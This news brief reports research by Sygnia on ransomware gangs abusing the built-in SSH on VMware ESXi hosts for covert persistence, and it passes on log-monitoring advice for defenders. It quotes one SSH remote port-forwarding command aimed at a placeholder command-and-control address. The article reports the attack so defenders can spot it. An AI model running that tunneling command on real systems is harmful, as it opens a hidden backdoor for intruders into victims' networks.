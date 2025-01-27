Ransomware, Threat Intelligence

Covert VMware ESXI-targeted ransomware hack facilitated by SSH tunneling

VMware company brand logo on official website

(Adobe Stock)

VMware ESXi hypervisors are being clandestinely subjected to ransomware intrusions involving the exploitation of SSH tunneling for persistence, reports BleepingComputer.

After infiltrating ESXi instances by leveraging known vulnerabilities or stolen admin credentials, ransomware gangs proceed to utilize the built-in SSH service to facilitate lateral movement and ransomware delivery without being detected, according to an investigation from cybersecurity firm Sygnia. "...[B]y using the SSH binary, a remote port-forwarding to the C2 server can be easily setup by using the following command: ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>. Since ESXi appliances are resilient and rarely shutdown unexpectedly, this tunneling serves as a semi-persistent backdoor within the network," said Sygnia. Such findings have prompted researchers to recommend monitoring of four log files for tracking ESXi Shell command execution, conducting admin and user authentication logs, obtaining attempted logins and authentication events, and keeping security event and system logs. Admins have also been urged to view the hostd.log and vodb.log to identify possible SSH access persistence.

An In-Depth Guide to Ransomware

Get essential knowledge and practical strategies to protect your organization from ransomware attacks.

Related

Hidden text salting in scam emails ramps up

Hidden text salting has not only been used to evade spam filters' keyword detection capabilities as shown in separate phishing attacks impersonating Wells Fargo and Norton LifeLock but also to dupe the language detection module of Microsoft and circumvent security filters.

Two Sanrio Japanese theme parks disrupted by cyberattack

Unauthorized systems infiltration between Jan. 21 and 22 has hampered both Sanrio Puroland, also known as Hello Kitty Land, and HarmonyLand from releasing purchased ticket codes and selling yearly passes, with the former noting in its data breach notification issues concerning the operations of its reservations service following the intrusion.

Attacks by Gamaredon copycat target Russia

Intrusions by Gama Copy also closely resembled those of the advanced persistent threat operation Core Werewolf with both groups' utilization of 7-ZIP self-extracting archive files for UltraVNC execution, port 443 for server connections, and the EnableDelayedExpansion command, an analysis from the Knownsec 404 Advanced Threat Intelligence team revealed.

Related Events

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

Related Terms

Account HarvestingBlack HatBusiness Email Compromise (BEC)Deauthentication AttackDefacementDictionary AttackDistributed ScansFault Line AttacksHybrid AttackPassword Cracking

You can skip this ad in 5 seconds